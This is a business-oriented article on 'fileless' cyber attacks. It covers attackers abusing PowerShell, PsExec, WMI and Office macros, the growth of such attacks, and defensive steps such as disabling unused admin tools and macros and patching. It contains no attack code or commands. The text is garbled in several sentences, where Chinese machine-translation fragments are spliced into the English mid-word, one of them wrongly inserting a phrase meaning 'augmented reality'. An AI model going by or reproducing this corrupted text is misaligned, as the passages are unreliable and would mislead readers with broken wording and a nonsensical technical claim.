5 Things You Need to Know About the New (and Scary) Wave of 'File-less' Cyber AttacksCompanies are bracing for cyber attacks that use those companies' own system tools against them -- and keep their IT professionals up at night.

In the wake of the Equifax breach and the globalWannaCry ransomware outbreak今年早些时候,在网络安全的紧张关系re at an all-time high. Companies are feeling more pressure to invest in new policies and products that can keep their sensitive data safe.

Yet even as they increase their security budgets, many organizations harbor real concerns as to whetheranyexisting technology can help them keep up with the rapidly evolving nature of today's threats.

Related:Got Effective Cybersecurity Practices? Be Aware: The FTC Is Watching You.

In particular, they're worried aboutthe steadily growing number of attacksdesigned to gain access to their systems and silently infect them silently,withoutever downloading malicious programs or leaving behind any obvious trace.

These attacks can go by several names. "Fileless attacks" is a common one, but "non-malware attacks and" "living-off-the-land attacks" are also used. The bottom line is these malicious actions are specifically designed to evade detection, primarily by using a victim company's trusted software and system tools against it. As a result, these attacks are quickly becoming the number-one threat keeping IT and security professionals up at night.

To clarify what actually constitutes a fileless attack and explain how it can work, here are five things every business leader should know:

1. Fileless attacks exploit a fundamental gap in traditional endpoint security.

Traditionally, cyber attacks involving malware have revolved around attackers gaining access to a victim's computer (typically by either exploiting a software vulnerability or tricking the victim into downloading something he or she shouldn't), and then installing an executable file (the "payload") that does the damage.

The problem with this approach from an attacker's perspective is that antivirus solutions are built to scan and block any suspicious files that land on the computer. By not installing malicious files, however,attackers can simply bypass these solutions。All they need to do is hijack otherwise legitimate system tools and trusted applications to do their dirty work for them.

Related:Phishing In All Its Forms Is a Menace to Small Businesses

2. There are a variety of fileless techniques attackers can use.

At a high level, attacks can be broken down into two primary stages: the initial compromise that gives attackers access to a target system, and the post-exploitation activities they conduct once those attackers are there. Attackers can utilize fileless techniques during one or both of these stages to accomplish their goals even as they evade traditional and even next-generation, machine-learning-powered antivirus software.

To gain initial access, attackers will often utilize exploits designed to take advantage of flaws in the software the victim is already running. The Equifax breach is a recent example. Attackers were able toexploit a vulnerability in the company's unpatched version of Apache Strutsand use it to execute malicious commands.

Exploiting vulnerable applications and injecting code into normal system processes are both popular fileless techniques for gaining access and execution on machines without getting noticed.

Once the initial compromise is complete, attackers can continue avoiding detection by abusing powerful system administration tools like PowerShell, PsExec and Windows Management Instrumentation (WMI). Because these tools have legitimate use cases, they allow attackers to hide in plain sight while they escalate privileges, move laterally throughout the network and achieve persistence by making changes to the registry.

3. A fileless attackcaninvolve files.

Before going any further, we should dispel one of the most common misunderstandings surrounding fileless attacks -- they oftendoinvolve files, especially in the initial compromise stage of the attack. The primary difference is that these files aren't malicious executables, but instead files like Microsoft Office documents.

The challenge from a traditional endpoint security perspective is that there is nothing inherently malicious about these files on their own, so scanning them won't necessarily raise any red flags. That makes them the perfect vehicles to kick off an attack.

For example, an attack may begin with an employee being tricked into opening a Word document received in a phishing email; the employee thus inadvertently activates a macro or script embedded inside.

That macro or script then launhes PowerShell, a legitimate framework built into Windows for automating system-administration tasks. From there, the attacker uses PowerShell to execute malicious code directly in memory, making the attack from this point forward truly fileless.

因为单个组件的基于“增大化现实”技术的攻击en't malicious, security solutions need to be able to observe how they are behaving together, and recognize when a chain of behaviors from otherwise legitimate programs constitutes an attack.

4. Fileless attacks are on the rise.

In truth, many of the techniques that fileless attacks utilize have been around for some time. In-memory exploits, for example, date back to the prolificCode RedandSQL Slammerworms of the early 2000s. But the creation and widespread distribution of easy-to-use attack tools and exploit kits has made them far more prevalent. In particular, penetration-testing frameworks like Metasploit and PowerSploit are being abused since they provide ready-made fileless exploits that can be added to any attack.

As a result, these techniques aren't limited to sophisticated hackers and nation-state espionage groups anymore. They're readily available for the average cyber criminal to use, and the number of fileless attacks on companies has risen dramatically. Once considered fringe cases, according to theSANS2017 Threat Landscapesurvey, fileless attacks have been reported by nearly a third of the organizations polled.

5. Fileless attacks can be stopped.

While fileless techniques can be extremely difficult to detect, there are things you can do to protect your business and reduce your risk. A good first step is to disable admin tools that your organization isn't actively utilizing, or, at the least, restrict their permissions and functionality. Because so many fileless techniques rely on it, PowerShell should be at the top of your list to consider limiting or disabling altogether.

Likewise, disabling Office macros can take awayone of the most common launching points for fileless attacks。操作系统和应用程序应该拍ched as religiously as possible, and when patching isn't feasible, those systems should be isolated to prevent potential attacks from spreading.

Related:4 Vital Cyber Security Measures Every Safety-Conscious Entrepreneur Needs to Take

With no files to scan, detecting and blocking fileless attacks ultimately comes down to your IT department's ability to identify malicious activity and behaviors on the end point --ideally before any damage is done。There are new end-point solutions that can accomplish that task and stop fileless attacks in real time and before they are able to compromise the device. IT and security leaders should investigate their options to determine the right solution for keeping their organizations safe.